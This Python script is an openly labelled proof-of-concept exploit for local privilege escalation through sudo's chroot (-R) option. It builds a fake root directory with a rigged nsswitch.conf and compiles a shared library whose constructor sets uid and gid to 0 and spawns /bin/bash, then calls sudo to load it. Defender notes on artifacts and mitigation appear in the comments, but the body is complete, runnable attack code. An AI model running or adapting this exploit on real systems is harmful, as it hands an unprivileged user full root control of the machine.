exploit.py
#!/usr/bin/python3
import os,subprocess,shutil,tempfile
# Proof-of-concept for a local privilege escalation through sudo's -R
# (--chroot) option: it stages a fake root directory holding its own
# etc/nsswitch.conf plus a shared object, then asks sudo to chroot into it.
# NOTE(review): the script does not name the advisory it targets; presumably
# it relies on a sudo build that reads NSS configuration from the
# caller-supplied root before the policy check. Confirm against the vendor
# advisory for the installed sudo version.
#
# Defender notes drawn from the steps below:
#   - Artifacts: a /tmp/sudowoot.stage.* directory containing woot1337.c,
#     woot/etc/nsswitch.conf and libnss_/woot1337.so.2. A failed compile
#     raises before the final rmtree, so the directory is left on disk.
#   - Process telemetry: an unprivileged gcc -shared build writing into a
#     directory named libnss_, followed by `sudo -R <dir> <command>`.
#   - Mitigation: run a vendor-fixed sudo release and do not permit the
#     chroot option in sudoers unless it is actually needed.

# Private staging directory under /tmp; every relative path below resolves
# inside it because of the chdir.
temp_dir = tempfile.mkdtemp(prefix='sudowoot.stage.', dir='/tmp')
os.chdir(temp_dir)

# C source for the shared object. The constructor runs when the library is
# loaded: it sets real/effective uid and gid to 0, changes directory to "/"
# and replaces the process image with /bin/bash. This only yields a root
# shell if the loading process is already privileged (here, sudo).
code = '''
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
'''
with open('woot1337.c', 'w') as wf:
    wf.write(code)

# 'woot' is the directory later handed to sudo -R as the new root;
# 'libnss_' is the output directory for the compiled library.
os.makedirs('woot/etc', exist_ok=True)
os.makedirs('libnss_', exist_ok=True)

# nsswitch.conf inside the fake root names "/woot1337" as the passwd source.
# glibc forms NSS module names as libnss_<source>.so.2, so this source name
# appears intended to resolve to the relative path libnss_/woot1337.so.2
# built below. TODO confirm against the glibc NSS loader.
with open('woot/etc/nsswitch.conf', 'w') as wn:
    wn.write('passwd: /woot1337')

# Copies the host's group database into the fake root; presumably so group
# lookups made after the chroot still succeed (TODO confirm).
shutil.copy('/etc/group', 'woot/etc')

# Build the position-independent shared object. -Wl,-init,woot also
# registers woot() as the library's init function at link time.
compile_code = ['gcc', '-shared', '-fPIC', '-Wl,-init,woot',
                '-o', 'libnss_/woot1337.so.2', 'woot1337.c']
subprocess.run(compile_code, check=True)
print('woot!')

# Invoke sudo with the fake root. The trailing 'woot' is the command
# argument; no such program is created by this script.
run_e = ['sudo', '-R', 'woot', 'woot']
try:
    subprocess.run(run_e, check=True)
except subprocess.CalledProcessError :
    # A non-zero exit from sudo is ignored so the cleanup below still runs.
    pass

# Remove the staging directory. This is reached only after sudo (and any
# shell it spawned) has exited.
shutil.rmtree(temp_dir)